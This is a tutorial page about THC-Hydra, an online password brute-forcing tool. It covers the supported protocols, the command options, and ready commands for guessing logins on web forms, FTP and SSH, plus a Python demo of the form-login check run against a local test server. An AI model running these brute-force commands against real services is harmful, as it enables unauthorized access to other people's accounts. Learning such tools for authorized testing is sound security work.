
Hydra


Hydra (THC-Hydra) is an online password-cracking program: it brute-forces network logins by submitting guesses to a live service, as opposed to offline crackers that work on captured password hashes.

  • Hydra is typically used to interact with a victim server (for example, web server, FTP server, SSH server, file server) and try a list of username/password combinations.

According to its official repository, Hydra can brute force the following protocols: “Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak (TS2), Telnet, VMware-Auth, VNC and XMPP.”
For more information on the options of each protocol in Hydra, you can check the Kali Hydra tool page.

Usage#

```plaintext
hydra -l [user] -P [wordlist] [uri] -t [number of parallel tasks, e.g. 4] -V
```

```plaintext
 -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
 -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
 -C FILE    colon separated "login:pass" format, instead of -L/-P options
 -M FILE    list of servers to attack, one entry per line, ':' to specify port
 -t TASKS   run TASKS number of connects in parallel per target (default: 16)
 -s PORT    if the service is on a different default port, define it here
 -f         exit when a login/pass pair is found
 -U         service module usage details
 -V         verbose mode, shows each login/password pair as it is attempted
```

Post Web Form#

For a login form submitted with POST, the http-post-form module takes the path, the request body and a success/failure condition in one colon-separated argument:

```plaintext
hydra -l <username> -P <wordlist> <ip> http-post-form "<path>:<login_credentials>:<invalid_response>" -V
```

| Option | Description |
|---|---|
| http-post-form | the form is submitted with POST (use https-post-form for TLS, http-get-form for GET forms) |
| `<path>` | the path of the login page, for example, /login.php |
| `<login_credentials>` | the form fields sent on login, with ^USER^ and ^PASS^ as placeholders, for example, username=^USER^&password=^PASS^ |
| `<invalid_response>` | F=<string>, a string that appears in the response only when the login fails; alternatively S=<string>, a string that appears only on success |
| -V | verbose output for every attempt |

Example:

```plaintext
hydra -l admin -P passlist.txt www.website.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
```

  • The login page is /login on www.website.com (if the form were served from the site root, the path would be just /).
  • username is the form field where the username is entered; the specified username(s) replace ^USER^.
  • password is the form field where the password is entered; the provided passwords replace ^PASS^.
  • F=incorrect is a string that appears in the server reply when the login fails. Take it from a manual login attempt with a known-bad password: if the string never appears in a failed login's response, Hydra treats every guess as a hit and reports the first password in the list as valid.
  • If the web server is listening on a non-default port number, specify it explicitly with -s <port>.
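To make the F=/S= condition concrete, here is an added example (not Hydra's code and not from the original page) that re-implements the http-post-form check in Python against a constructed in-process login server. The server, the single valid account admin/letmein and the four-entry wordlist are all assumptions made up for the demo. It shows the placeholder substitution, the failure-string test, and the false positive you get when the F= string is wrong.

```python
"""Minimal re-implementation of the http-post-form logic (added example,
not Hydra's code). A constructed local HTTP server stands in for the target."""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs
from urllib.request import Request, urlopen

# Constructed target account for the demo (assumption, not from the page).
VALID = {"admin": "letmein"}


class LoginHandler(BaseHTTPRequestHandler):
    """Answers POST /login; both outcomes return HTTP 200, so only the body
    tells success from failure, which is exactly what F=/S= match on."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if self.path == "/login" and VALID.get(user) == pw:
            body = b"<h1>Welcome back, admin</h1>"
        else:
            body = b"<p>Login incorrect, try again.</p>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo server quiet
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)  # ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def http_post_form(base_url, spec, login, passwords):
    """spec follows Hydra's "<path>:<body with ^USER^/^PASS^>:<F=|S=>string".
    Returns the first password judged valid, or None."""
    path, template, cond = spec.split(":", 2)
    mode, marker = cond[:2], cond[2:]
    if mode not in ("F=", "S="):
        raise ValueError("condition must start with F= or S=")
    for pw in passwords:
        body = template.replace("^USER^", login).replace("^PASS^", pw)
        req = Request(base_url + path, data=body.encode(),
                      headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urlopen(req) as resp:
            text = resp.read().decode()
        present = marker in text
        # F=: a hit is a response WITHOUT the failure string.
        # S=: a hit is a response WITH the success string.
        if (mode == "F=" and not present) or (mode == "S=" and present):
            return pw
    return None


def run_demo():
    srv = start_server()
    base = f"http://127.0.0.1:{srv.server_port}"
    wordlist = ["123456", "password", "letmein", "qwerty"]  # constructed
    creds = "username=^USER^&password=^PASS^"
    results = {
        # Correct failure string: only the real password is reported.
        "fail_marker": http_post_form(base, f"/login:{creds}:F=incorrect", "admin", wordlist),
        # Success string works the same way from the other direction.
        "success_marker": http_post_form(base, f"/login:{creds}:S=Welcome", "admin", wordlist),
        # Wrong failure string never appears, so the very first guess "succeeds".
        "wrong_marker": http_post_form(base, f"/login:{creds}:F=denied", "admin", wordlist),
    }
    srv.shutdown()
    srv.server_close()
    return results


if __name__ == "__main__":
    print(run_demo())
```

Running it prints letmein for the correct F= and S= conditions and 123456 for the bogus one, which is why the failure string should always be verified with a known-bad login before a long run.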

FTP#

  • For example, say you know that an FTP user’s username is omar. You can then try a file that contains a list of passwords against an FTP server (10.1.2.3) with the following command, which uses Hydra’s service://host URI form:

```plaintext
hydra -l omar -P passwords.txt ftp://10.1.2.3
```

SSH#

```plaintext
hydra -l <username> -P <full path to pass> 10.49.149.162 -t 4 ssh
```

-t 4 keeps the parallel tasks low: many sshd configurations cap concurrent unauthenticated connections (MaxStartups), and Hydra itself warns and recommends -t 4 for the ssh module when more tasks are requested.

We can also use Metasploit for brute-forcing SSH (the auxiliary/scanner/ssh/ssh_login module).

https://nahil.xyz/vault/tools/hydra/
Author Nahil Rasheed
Published at June 15, 2025
Disclaimer This content is provided strictly for educational purposes only.